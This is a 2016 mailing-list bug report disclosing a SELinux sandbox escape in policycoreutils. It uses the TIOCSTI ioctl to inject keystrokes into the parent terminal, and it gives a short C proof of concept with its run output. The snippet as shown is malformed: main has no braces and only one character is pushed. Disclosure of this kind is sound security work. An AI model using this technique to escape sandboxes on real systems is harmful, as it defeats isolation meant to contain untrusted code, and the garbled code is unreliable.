[DSE-Dev] Bug#838599: policycoreutils SELinux sandbox escape via TIOCSTI ioctl

up201407890 at alunos.dcc.fc.up.pt up201407890 at alunos.dcc.fc.up.pt
Thu Sep 22 19:10:31 UTC 2016

Package: policycoreutils
Severity: important
Tags: security


When executing a program via the SELinux sandbox, the nonpriv session  
can escape to the parent session by using the TIOCSTI ioctl to push  
characters into the terminal's input buffer, allowing an attacker to  
escape the sandbox.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>

int main()
   char *cmd = "id\n";
    ioctl(0, TIOCSTI, cmd++);
   execlp("/bin/id", "id", NULL);

$ gcc test.c -o test
$ /bin/sandbox ./test
uid=1000 gid=1000 groups=1000  
[saken at ghetto ~]$ id    <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)  

This is similar to CVE-2016-2568, CVE-2016-2779, etc.

Federico Bento.

This message was sent using IMP, the Internet Messaging Program.

More information about the SELinux-devel mailing list